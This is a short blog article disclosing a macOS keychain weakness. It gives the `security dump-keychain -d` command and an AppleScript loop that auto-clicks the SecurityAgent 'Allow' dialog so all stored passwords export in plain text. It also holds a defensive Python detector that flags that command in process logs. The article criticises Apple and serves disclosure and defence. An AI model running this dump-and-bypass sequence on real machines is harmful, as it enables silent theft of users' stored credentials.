This Security Flaw Can Display All Keychain Passwords in Plain Text

Just a few days ago, a client of mine learned the hard way not to let a scam company take control of your computer to provide you with support. What I learned from this experience shocked me to the core of my being.

There is a method in OS X that allows people to export the keychain without sudo privileges or system dialogs. The export is written to a text file with the usernames and passwords displayed in plain text.

At the time of writing this small article, it works on 10.10 and 10.11.5.

The command is as follows:

security dump-keychain -d login.keychain > keychain.txt

The way around the system dialogs is to add:

tell application "System Events"
    repeat while exists (processes where name is "SecurityAgent")
        tell process "SecurityAgent"
            click button "Allow" of group 1 of window 1
        end tell
        delay 0.2
    end repeat
end tell

Any unauthorized user can then gain access to every username and password that was ever stored in the keychain and iCloud.
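For defenders, the command shown above is easy to spot in process-execution telemetry. The following is an added example, not code from the original article: it scans constructed log lines (the record format, user names, script path and 30-second window are assumptions) for `security dump-keychain` run with `-d`, and raises the severity when the same user ran `osascript` close to it in time.

```python
import os
import shlex
from datetime import datetime, timedelta

# Constructed sample records, "<ISO time>|<user>|<command line>"; the format is an assumption.
SAMPLE_LOG = """\
2016-06-01T10:14:55|alice|/usr/bin/security find-generic-password -s office-wifi
2016-06-01T10:15:01|alice|/usr/bin/osascript /Users/alice/Downloads/support.scpt
2016-06-01T10:15:02|alice|/usr/bin/security dump-keychain -d login.keychain
2016-06-01T11:40:10|bob|security dump-keychain login.keychain
2016-06-01T12:05:00|carol|/usr/bin/security dump-keychain -d login.keychain
"""

WINDOW = timedelta(seconds=30)  # correlation window, an arbitrary choice


def parse(line):
    """Split one record into (timestamp, user, argv)."""
    ts, user, cmd = line.split("|", 2)
    return datetime.fromisoformat(ts), user, shlex.split(cmd)


def is_secret_dump(argv):
    """True for `security dump-keychain` run with -d (decrypted secrets requested)."""
    if not argv or os.path.basename(argv[0]) != "security":
        return False
    if "dump-keychain" not in argv[1:]:
        return False
    flags = argv[argv.index("dump-keychain", 1) + 1:]
    # Accept "-d" alone or combined with other short options, e.g. "-ad".
    return any(f.startswith("-") and not f.startswith("--") and "d" in f[1:] for f in flags)


def detect(log_text):
    """Return (time, user, severity) for each keychain secret dump in the log."""
    events = [parse(l) for l in log_text.splitlines() if l.strip()]
    findings = []
    for ts, user, argv in events:
        if not is_secret_dump(argv):
            continue
        # Heuristic: osascript by the same user near the dump suggests scripted prompt handling.
        scripted = any(u == user and a and os.path.basename(a[0]) == "osascript"
                       and abs(ts - t) <= WINDOW for t, u, a in events)
        findings.append((ts.isoformat(), user, "high" if scripted else "medium"))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding)
```

A dump without `-d` (the `bob` record) is not flagged here because it lists keychain items without requesting their decrypted secrets.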

Apple is known for priding itself on its level of security, but this has been a known method for over two years now. I can strongly say that this is a major security flaw -- they should at least force people to confirm their password. The Keychain dialog requires you to enter your password when you want to show the password for an entry.

Shouldn't a command within the terminal require the same levels of security?


Written by

Traven

Traven is the Lead Author and Editor of TEKaholics. He loves to talk about programming and security topics. His mindset follows security-first programming. He strives to spread knowledge, updates, and his weirdness to everyone who is willing to listen.